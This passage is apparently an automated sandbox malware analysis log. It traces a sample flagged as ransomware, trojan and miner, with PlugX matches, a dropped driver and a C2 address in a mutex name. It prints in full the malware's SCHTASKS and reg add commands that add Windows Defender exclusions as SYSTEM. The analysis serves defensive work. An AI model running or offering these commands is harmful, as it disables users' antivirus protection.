                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004D18A3 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,49_2_004D18A3
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004CAEAD GetKeyState,GetKeyState,GetKeyState,GetKeyState,49_2_004CAEAD

                Spam, unwanted Advertisements and Ransom Demands

                Source: C:\Users\user\Desktop\2976587-987347589.07.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\d[1].gif entropy: 7.9954955896
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeFile created: C:\Users\user\Documents\MsMpList.dat entropy: 7.99993875511
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\a[1].gif entropy: 7.99530439254
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\b[1].gif entropy: 7.99352271294
                Source: C:\Users\user\Documents\l0tiFM.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\drops[1].jpg entropy: 7.99178106276
                Source: C:\Users\user\Documents\l0tiFM.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\FOM-50[1].jpg entropy: 7.99273647747
                Source: C:\Users\user\Documents\l0tiFM.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\FOM-51[1].jpg entropy: 7.99995626102
                Source: C:\Users\user\Documents\l0tiFM.exeFile created: C:\Program Files (x86)\DfP1K3\tbcore3U.dll entropy: 7.99251721315
                Source: C:\Users\user\Documents\l0tiFM.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\FOM-52[1].jpg entropy: 7.99951889252
                Source: C:\Users\user\Documents\l0tiFM.exeFile created: C:\Program Files (x86)\DfP1K3\log.src entropy: 7.99995522519
                Source: C:\Users\user\Documents\l0tiFM.exeFile created: C:\Program Files (x86)\DfP1K3\utils.vcxproj entropy: 7.99939956496
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\dsb-hr2[1].png entropy: 7.99718672167
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeFile created: C:\ProgramData\efk2JUeS\lBoqoqIC.dat entropy: 7.99488264959
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\dsb-hr3[1].png entropy: 7.99947389782
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeFile created: C:\ProgramData\efk2JUeS\lBoqoqIC.png entropy: 7.99936711612
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\dsb-hr1[1].png entropy: 7.99964943719
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeFile created: C:\Program Files (x86)\3q7mMte5\log.src entropy: 7.9999552261
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeFile created: C:\Program Files (x86)\3q7mMte5\tbcore3U.dll entropy: 7.99251660296
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeFile created: C:\Program Files (x86)\3q7mMte5\utils.vcxproj entropy: 7.99939967013
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\extra-task2[1].png entropy: 7.99990094954
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\page-404[1].png entropy: 7.99974552668

                System Summary

                Source: 6.2.l0tiFM.exe.2800000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                Source: 42.2.DfP1K3.exe.32a0000.6.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                Source: Process Memory Space: DfP1K3.exe PID: 7124, type: MEMORYSTRMatched rule: PlugX Identifying Strings Author: Seth Hardy
                Source: lBoqoqIC.dat.42.drZip Entry: encrypted
                Source: tbcore3U.dll.7.drStatic PE information: section name: .%?.
                Source: tbcore3U.dll.7.drStatic PE information: section name: .%-[
                Source: tbcore3U.dll.7.drStatic PE information: section name: .mo:
                Source: 53jGFr5v.exe.42.drStatic PE information: section name: .1Q[
                Source: 53jGFr5v.exe.42.drStatic PE information: section name: .),E
                Source: 53jGFr5v.exe.42.drStatic PE information: section name: .sc=
                Source: tbcore3U.dll.42.drStatic PE information: section name: .%?.
                Source: tbcore3U.dll.42.drStatic PE information: section name: .%-[
                Source: tbcore3U.dll.42.drStatic PE information: section name: .mo:
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_0000000140006C95 NtAllocateVirtualMemory,6_2_0000000140006C95
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004C6A59 NtdllDefWindowProc_A,49_2_004C6A59
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004C728C NtdllDefWindowProc_A,CallWindowProcA,49_2_004C728C
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004C8F92 NtdllDefWindowProc_A,49_2_004C8F92
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004C764B wsprintfA,wsprintfA,GetClassInfoA,NtdllDefWindowProc_A,49_2_004C764B
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004C763B wsprintfA,GetClassInfoA,NtdllDefWindowProc_A,49_2_004C763B
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_00429E78: __EH_prolog,SetFileAttributesA,CreateFileA,DeviceIoControl,CloseHandle,49_2_00429E78
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,6_2_0000000140001520
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_0043A30A __EH_prolog,GetVersionExA,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,MessageBoxA,49_2_0043A30A
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeFile created: C:\Windows\System32\drivers\189atohci.sys
                Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exe 7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                Source: 6.2.l0tiFM.exe.2800000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                Source: 42.2.DfP1K3.exe.32a0000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                Source: Process Memory Space: DfP1K3.exe PID: 7124, type: MEMORYSTRMatched rule: PlugXStrings author = Seth Hardy, description = PlugX Identifying Strings, last_modified = 2014-06-12
                Source: 189atohci.sys.0.drBinary string: \Device\Driver\
                Source: 189atohci.sys.0.drBinary string: \Device\TrueSight
                Source: classification engineClassification label: mal100.rans.troj.evad.mine.winEXE@68/43@16/5
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_0041A8DE __EH_prolog,GetLastError,FormatMessageA,LocalFree,GetTickCount,49_2_0041A8DE
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,6_2_0000000140003F80
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_0043A30A __EH_prolog,GetVersionExA,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,MessageBoxA,49_2_0043A30A
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_0040DEFA GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,49_2_0040DEFA
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: GetModuleFileNameW,OpenSCManagerW,GetLastError,CreateServiceW,CloseServiceHandle,GetLastError,CloseServiceHandle,6_2_0000000140001430
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: CreateServiceA,49_2_00405581
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_00421C40 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,48_2_00421C40
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_00414AF3 CoCreateInstance,lstrcpy,lstrlen,MultiByteToWideChar,49_2_00414AF3
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004A893C FindResourceA,LoadResource,LockResource,49_2_004A893C
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,6_2_0000000140001520
                Source: C:\Users\user\Documents\l0tiFM.exeFile created: C:\Program Files (x86)\DfP1K3
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\i[1].dat
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeMutant created: \Sessions\1\BaseNamedObjects\Global\IEToolbarUninstaller
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6032:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6764:120:WilError_03
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeMutant created: \Sessions\1\BaseNamedObjects\26f3475fc22
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeMutant created: \Sessions\1\BaseNamedObjects\{4E062DDA-444A-A2A8-84CE-E105F66A5AB3}
                Source: C:\ProgramData\atBs3ba9\d0oKoK2T.exeMutant created: \Sessions\1\BaseNamedObjects\S-1-15-2-515815643-2845804217-1874292103-218650560-777617685-4287762684-137415000
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeMutant created: \Sessions\1\BaseNamedObjects\E2D0491F7A75AE94FCCD983BDDFDOLED
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5480:120:WilError_03
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeMutant created: \Sessions\1\BaseNamedObjects\8.210.66.183:8917:Sauron
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5092:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6188:120:WilError_03
                Source: C:\ProgramData\53jGFr5v.exeMutant created: \Sessions\1\BaseNamedObjects\AAAAAAAAAAAAAAAAC
                Source: C:\Users\user\Documents\l0tiFM.exeMutant created: \Sessions\1\BaseNamedObjects\48c47662941
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5264:120:WilError_03
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeMutant created: \Sessions\1\BaseNamedObjects\LJPXYXC
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeMutant created: \Sessions\1\BaseNamedObjects\CCD983BDD1F7A75AE9E2D0494FFAOLED
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeMutant created: \Sessions\1\BaseNamedObjects\aefd_284992
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6480:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6104:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1816:120:WilError_03
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeFile created: C:\Users\user\AppData\Local\Temp\_ir_tu2_temp_0\
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeCommand line argument: ^Iu44_2_00841000
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeCommand line argument: tbcore3.dll44_2_00841000
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeCommand line argument: tbcore3U.dll44_2_00841000
                Source: C:\ProgramData\53jGFr5v.exeCommand line argument: .-C48_2_00432C80
                Source: 2976587-987347589.07.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Documents\l0tiFM.exeFile read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: 2976587-987347589.07.exeVirustotal: Detection: 15%
                Source: DfP1K3.exeString found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>t
                Source: DfP1K3.exeString found in binary or memory: tartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate>
                Source: DfP1K3.exeString found in binary or memory: tartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate>
                Source: DfP1K3.exeString found in binary or memory: <Repetition> <Interval>PT1M</Interval> <StopAtDurationEnd>false</StopAtDurationEnd> </Repetition> <Sta
                Source: DfP1K3.exeString found in binary or memory: <Repetition> <Interval>PT1M</Interval> <StopAtDurationEnd>false</StopAtDurationEnd> </Repetition> <Sta
                Source: C:\Users\user\Desktop\2976587-987347589.07.exe File read: C:\Users\user\Desktop\2976587-987347589.07.exe
                Source: unknown Process created: C:\Users\user\Desktop\2976587-987347589.07.exe "C:\Users\user\Desktop\2976587-987347589.07.exe"
                Source: unknown Process created: C:\Users\user\Documents\l0tiFM.exe C:\Users\user\Documents\l0tiFM.exe
                Source: unknown Process created: C:\Users\user\Documents\l0tiFM.exe C:\Users\user\Documents\l0tiFM.exe
                Source: C:\Users\user\Documents\l0tiFM.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
                Source: unknown Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                Source: C:\Users\user\Documents\l0tiFM.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
                Source: unknown Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                Source: C:\Users\user\Documents\l0tiFM.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
                Source: unknown Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                Source: C:\Users\user\Documents\l0tiFM.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
                Source: unknown Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
                Source: C:\Users\user\Documents\l0tiFM.exe Process created: C:\Program Files (x86)\DfP1K3\DfP1K3.exe "C:\Program Files (x86)\DfP1K3\DfP1K3.exe"
                Source: unknown Process created: C:\Program Files (x86)\DfP1K3\DfP1K3.exe "C:\Program Files (x86)\DfP1K3\DfP1K3.exe"
                Source: unknown Process created: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exe "C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exe"
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\xxxx.ini
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknown Process created: C:\Program Files (x86)\DfP1K3\DfP1K3.exe "C:\Program Files (x86)\DfP1K3\DfP1K3.exe"
                Source: unknown Process created: C:\ProgramData\53jGFr5v.exe C:\ProgramData\53jGFr5v.exe
                Source: unknown Process created: C:\ProgramData\efk2JUeS\lBoqoqIC.exe C:\ProgramData\efk2JUeS\lBoqoqIC.exe
                Source: unknown Process created: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exe "C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exe"
                Source: unknown Process created: C:\Program Files (x86)\DfP1K3\DfP1K3.exe "C:\Program Files (x86)\DfP1K3\DfP1K3.exe"
                Source: unknown Process created: C:\ProgramData\atBs3ba9\d0oKoK2T.exe C:\ProgramData\atBs3ba9\d0oKoK2T.exe 1776
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: kernel.appcore.dll
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: uxtheme.dll
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: tbcore3u.dll
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeSection loaded: apphelp.dll
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeSection loaded: kernel.appcore.dll
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeSection loaded: uxtheme.dll
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeSection loaded: tbcore3u.dll
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: kernel.appcore.dll
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: uxtheme.dll
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: tbcore3u.dll
                Source: C:\ProgramData\53jGFr5v.exeSection loaded: apphelp.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: netapi32.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: oledlg.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: olepro32.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: urlmon.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: version.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: wininet.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: winmm.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: iertutil.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: srvcli.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: netutils.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: uxtheme.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: kernel.appcore.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: windows.storage.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: wldp.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: propsys.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: profapi.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: textinputframework.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: coreuicomponents.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: coremessaging.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: ntmarta.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: wintypes.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: wintypes.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: wintypes.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: taskschd.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: sspicli.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: xmllite.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: winhttp.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: mswsock.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: iphlpapi.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: winnsi.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: dpapi.dll
